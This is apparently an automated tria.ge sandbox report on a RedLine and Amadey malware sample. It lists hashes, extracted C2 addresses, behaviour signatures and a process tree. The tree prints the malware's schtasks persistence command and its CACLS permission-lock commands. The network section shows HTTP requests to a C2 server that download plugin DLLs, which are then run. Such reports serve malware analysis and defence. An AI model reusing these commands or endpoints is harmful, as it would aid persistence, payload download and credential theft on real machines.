Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    159s
  • max time network
    174s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/02/2023, 05:01 UTC

General

  • Target

    file.exe

  • Size

    725KB

  • MD5

    58d006f142bc0bdb7d8cac78f9a12d69

  • SHA1

    d04d3b29b2dc0552ecba06a59392ff618faf2791

  • SHA256

    49c4b37a938e23a86d7890cdac6694a361e3c98a9d7a5965fed980f14262b247

  • SHA512

    3b0c047c68020ca0e72b3220610eed39462fe9ef990de99c3bc9fba592fbf36f1a3c1f8a4d015f4c84716e9cf456f244313c99fd58f7c80f1c835e1cbeb5f29b

  • SSDEEP

    12288:VMrdy90SS6bC3QfpxrHR9HeJJ+5WHK9zrm2FOvIeXoBonel2:My1bFHbRqWJlxroneg

Malware Config

Extracted

Family

redline

Botnet

dunm

C2

193.233.20.12:4132

Attributes
  • auth_value

    352959e3707029296ec94306d74e2334

Extracted

Family

amadey

Version

3.66

C2

62.204.41.4/Gol478Ns/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4608
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gYS55oB.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gYS55oB.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\goD64TX.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\goD64TX.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2188
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\avT11rY.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\avT11rY.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4632
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bea43rV.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bea43rV.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1884
          • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
            "C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4792
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:4368
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "Admin:N"&&CACLS "..\4b9a106e76" /P "Admin:R" /E&&Exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3004
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                  PID:4028
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "mnolyk.exe" /P "Admin:N"
                  7⤵
                    PID:4020
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "mnolyk.exe" /P "Admin:R" /E
                    7⤵
                      PID:2152
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      7⤵
                        PID:2504
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\4b9a106e76" /P "Admin:N"
                        7⤵
                          PID:3876
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\4b9a106e76" /P "Admin:R" /E
                          7⤵
                            PID:4316
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          6⤵
                          • Loads dropped DLL
                          PID:1404
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dpq4505.exe
                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dpq4505.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1712
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 1308
                      4⤵
                      • Program crash
                      PID:2900
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fRk73.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fRk73.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4980
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1712 -ip 1712
                1⤵
                  PID:2444
                • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                  C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                  1⤵
                  • Executes dropped EXE
                  PID:3636

                Network

                • flag-ru
                  GET
                  http://62.204.41.4/Gol478Ns/Plugins/cred64.dll
                  mnolyk.exe
                  Remote address:
                  62.204.41.4:80
                  Request
                  GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                  Host: 62.204.41.4
                  Response
                  HTTP/1.1 404 Not Found
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sun, 12 Feb 2023 05:03:20 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: keep-alive
                • flag-ru
                  GET
                  http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                  mnolyk.exe
                  Remote address:
                  62.204.41.4:80
                  Request
                  GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                  Host: 62.204.41.4
                  Response
                  HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sun, 12 Feb 2023 05:03:25 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 91136
                  Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                  Connection: keep-alive
                  ETag: "63dd4219-16400"
                  Accept-Ranges: bytes
                • 193.233.20.12:4132
                  avT11rY.exe
                  260 B
                  5
                • 93.184.220.29:80
                  322 B
                  7
                • 20.42.65.89:443
                  322 B
                  7
                • 193.233.20.12:4132
                  avT11rY.exe
                  1.6MB
                  22.1kB
                  1161
                  399
                • 62.204.41.4:80
                  mnolyk.exe
                  260 B
                  5
                • 193.233.20.12:4132
                  dpq4505.exe
                  1.4MB
                  24.7kB
                  1064
                  437
                • 104.110.191.133:80
                  322 B
                  7
                • 104.110.191.133:80
                  322 B
                  7
                • 62.204.41.4:80
                  http://62.204.41.4/Gol478Ns/Plugins/clip64.dll
                  http
                  mnolyk.exe
                  3.5kB
                  94.6kB
                  73
                  72

                  HTTP Request

                  GET http://62.204.41.4/Gol478Ns/Plugins/cred64.dll

                  HTTP Response

                  404

                  HTTP Request

                  GET http://62.204.41.4/Gol478Ns/Plugins/clip64.dll

                  HTTP Response

                  200
                No results found

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                  Filesize

                  236KB

                  MD5

                  8bb923c4d81284daef7896e5682df6c6

                  SHA1

                  67e34a96b77e44b666c5479f540995bdeacf5de2

                  SHA256

                  9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                  SHA512

                  2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

                • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                  Filesize

                  236KB

                  MD5

                  8bb923c4d81284daef7896e5682df6c6

                  SHA1

                  67e34a96b77e44b666c5479f540995bdeacf5de2

                  SHA256

                  9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                  SHA512

                  2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

                • C:\Users\Admin\AppData\Local\Temp\4b9a106e76\mnolyk.exe

                  Filesize

                  236KB

                  MD5

                  8bb923c4d81284daef7896e5682df6c6

                  SHA1

                  67e34a96b77e44b666c5479f540995bdeacf5de2

                  SHA256

                  9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                  SHA512

                  2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fRk73.exe

                  Filesize

                  11KB

                  MD5

                  7e93bacbbc33e6652e147e7fe07572a0

                  SHA1

                  421a7167da01c8da4dc4d5234ca3dd84e319e762

                  SHA256

                  850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                  SHA512

                  250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fRk73.exe

                  Filesize

                  11KB

                  MD5

                  7e93bacbbc33e6652e147e7fe07572a0

                  SHA1

                  421a7167da01c8da4dc4d5234ca3dd84e319e762

                  SHA256

                  850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38

                  SHA512

                  250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91

                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gYS55oB.exe

                  Filesize

                  621KB

                  MD5

                  2d4dc0209571363888b52bd0b8dff68f

                  SHA1

                  a2d6c10c3b8d5d8ba43c1759d0c241cca7980f9e

                  SHA256

                  92823457274edf958f5e3e0618c9524442195efb8d329d29057f89caa3bbc6d5

                  SHA512

                  ed3f5e6b2b942f84afb9493252febb270cc74817cfcd885af6de1075f8f3884b5709918444daf0db4fa629a2043b1a8a99993c4bafa2cba8a14a77d0ae8886f3

                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\gYS55oB.exe

                  Filesize

                  621KB

                  MD5

                  2d4dc0209571363888b52bd0b8dff68f

                  SHA1

                  a2d6c10c3b8d5d8ba43c1759d0c241cca7980f9e

                  SHA256

                  92823457274edf958f5e3e0618c9524442195efb8d329d29057f89caa3bbc6d5

                  SHA512

                  ed3f5e6b2b942f84afb9493252febb270cc74817cfcd885af6de1075f8f3884b5709918444daf0db4fa629a2043b1a8a99993c4bafa2cba8a14a77d0ae8886f3

                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dpq4505.exe

                  Filesize

                  297KB

                  MD5

                  828bc96964e9263ad218e73b6a1bc9f0

                  SHA1

                  80dc270a7d3f3a51a6355610da3de48ef01a4395

                  SHA256

                  0e42850ff811159647afdbaf6d2527ce09dfff15059d5fe183bd936a565657ec

                  SHA512

                  f05cb6fc745dafb039450ef9affb28ddd278f9b7f08921c6fc1cfdf57b0e4636ed872907fec74d2df7d6307e45ada47112f614dc70d2570158f270cefe8f8e74

                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dpq4505.exe

                  Filesize

                  297KB

                  MD5

                  828bc96964e9263ad218e73b6a1bc9f0

                  SHA1

                  80dc270a7d3f3a51a6355610da3de48ef01a4395

                  SHA256

                  0e42850ff811159647afdbaf6d2527ce09dfff15059d5fe183bd936a565657ec

                  SHA512

                  f05cb6fc745dafb039450ef9affb28ddd278f9b7f08921c6fc1cfdf57b0e4636ed872907fec74d2df7d6307e45ada47112f614dc70d2570158f270cefe8f8e74

                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\goD64TX.exe

                  Filesize

                  286KB

                  MD5

                  19f8c012c2fcae66e16eb8472ab4101e

                  SHA1

                  13fe014e52e2eef79df7241bf97f65c2e30cb2cc

                  SHA256

                  644429804db325c3200f32e88bcf3f3de13eab182d46889b0d991276d30d659a

                  SHA512

                  e8d5d7bd0426b19ca7d45f282561a7478e47c6356f529432b14d515792c22bc06321710597d711e38236332e84538264ec3581417f20a06efa5066a1c3afa519

                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\goD64TX.exe

                  Filesize

                  286KB

                  MD5

                  19f8c012c2fcae66e16eb8472ab4101e

                  SHA1

                  13fe014e52e2eef79df7241bf97f65c2e30cb2cc

                  SHA256

                  644429804db325c3200f32e88bcf3f3de13eab182d46889b0d991276d30d659a

                  SHA512

                  e8d5d7bd0426b19ca7d45f282561a7478e47c6356f529432b14d515792c22bc06321710597d711e38236332e84538264ec3581417f20a06efa5066a1c3afa519

                • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\avT11rY.exe

                  Filesize

                  175KB

                  MD5

                  69f79e05d0c83aee310d9adfe5aa7f2b

                  SHA1

                  485c490180380051a14316564fbda07723be11b1

                  SHA256

                  c41dc7f6cc752595337cd7f209f923b43b061b201c6ab4dc02151afb90cd66e2

                  SHA512

                  f1789a74aeb83867c37ddeadcd06cddfc1454a94fcc122b35d67b0309b46742b9a6611e4c3e583baa90a3fd456e45c75ae5f1a206f6e4500c1f3f8ddf5e47b42

                • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\avT11rY.exe

                  Filesize

                  175KB

                  MD5

                  69f79e05d0c83aee310d9adfe5aa7f2b

                  SHA1

                  485c490180380051a14316564fbda07723be11b1

                  SHA256

                  c41dc7f6cc752595337cd7f209f923b43b061b201c6ab4dc02151afb90cd66e2

                  SHA512

                  f1789a74aeb83867c37ddeadcd06cddfc1454a94fcc122b35d67b0309b46742b9a6611e4c3e583baa90a3fd456e45c75ae5f1a206f6e4500c1f3f8ddf5e47b42

                • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bea43rV.exe

                  Filesize

                  236KB

                  MD5

                  8bb923c4d81284daef7896e5682df6c6

                  SHA1

                  67e34a96b77e44b666c5479f540995bdeacf5de2

                  SHA256

                  9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                  SHA512

                  2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

                • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bea43rV.exe

                  Filesize

                  236KB

                  MD5

                  8bb923c4d81284daef7896e5682df6c6

                  SHA1

                  67e34a96b77e44b666c5479f540995bdeacf5de2

                  SHA256

                  9b0410052289a8416a458401fbb9a74d6361f4769465431b209f32151d7c6f21

                  SHA512

                  2daed03277a343db5fcb22e26baea5cda41de39dc825fe0aad51f6ec181b8f38f09427f27fb58ffd179f37032600d107ef772cc6275f7d0d62899c6cd3f8aff7

                • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                  Filesize

                  89KB

                  MD5

                  c79b74d8fec5e7e2ba2f1789fd582a15

                  SHA1

                  78a1e5d99dbaccc5e07b125e1dfb280112cb3128

                  SHA256

                  b5bd049d32f0faeea6ce65a0f0d326de5bc4427a7c1ad24bfb0ea050c1dec7d3

                  SHA512

                  0debfc54904fd538cfb1fc648d18f90a991337200b3decf74b28ac2f341843fb3bab4f45bc92cfec333b18dfff9cc136854462e79054a39926a7bd8ee2e057ba

                • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                  Filesize

                  89KB

                  MD5

                  c79b74d8fec5e7e2ba2f1789fd582a15

                  SHA1

                  78a1e5d99dbaccc5e07b125e1dfb280112cb3128

                  SHA256

                  b5bd049d32f0faeea6ce65a0f0d326de5bc4427a7c1ad24bfb0ea050c1dec7d3

                  SHA512

                  0debfc54904fd538cfb1fc648d18f90a991337200b3decf74b28ac2f341843fb3bab4f45bc92cfec333b18dfff9cc136854462e79054a39926a7bd8ee2e057ba

                • memory/1712-171-0x00000000023F0000-0x000000000243B000-memory.dmp

                  Filesize

                  300KB

                • memory/1712-179-0x0000000000400000-0x00000000007A6000-memory.dmp

                  Filesize

                  3.6MB

                • memory/1712-178-0x00000000008E2000-0x0000000000911000-memory.dmp

                  Filesize

                  188KB

                • memory/1712-173-0x00000000008E2000-0x0000000000911000-memory.dmp

                  Filesize

                  188KB

                • memory/1712-172-0x0000000000400000-0x00000000007A6000-memory.dmp

                  Filesize

                  3.6MB

                • memory/1712-170-0x00000000008E2000-0x0000000000911000-memory.dmp

                  Filesize

                  188KB

                • memory/4632-148-0x0000000005CB0000-0x0000000005D42000-memory.dmp

                  Filesize

                  584KB

                • memory/4632-146-0x0000000005980000-0x00000000059E6000-memory.dmp

                  Filesize

                  408KB

                • memory/4632-144-0x0000000002620000-0x0000000002632000-memory.dmp

                  Filesize

                  72KB

                • memory/4632-147-0x00000000061A0000-0x0000000006744000-memory.dmp

                  Filesize

                  5.6MB

                • memory/4632-145-0x0000000004C80000-0x0000000004CBC000-memory.dmp

                  Filesize

                  240KB

                • memory/4632-143-0x0000000004D50000-0x0000000004E5A000-memory.dmp

                  Filesize

                  1.0MB

                • memory/4632-142-0x0000000005260000-0x0000000005878000-memory.dmp

                  Filesize

                  6.1MB

                • memory/4632-141-0x0000000000240000-0x0000000000272000-memory.dmp

                  Filesize

                  200KB

                • memory/4632-151-0x0000000006010000-0x0000000006086000-memory.dmp

                  Filesize

                  472KB

                • memory/4632-149-0x0000000006750000-0x0000000006912000-memory.dmp

                  Filesize

                  1.8MB

                • memory/4632-150-0x0000000006E50000-0x000000000737C000-memory.dmp

                  Filesize

                  5.2MB

                • memory/4632-152-0x0000000005EB0000-0x0000000005F00000-memory.dmp

                  Filesize

                  320KB

                • memory/4980-183-0x00000000003E0000-0x00000000003EA000-memory.dmp

                  Filesize

                  40KB

                • memory/4980-184-0x00007FFA667C0000-0x00007FFA67281000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4980-185-0x00007FFA667C0000-0x00007FFA67281000-memory.dmp

                  Filesize

                  10.8MB

                We care about your privacy.

                This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.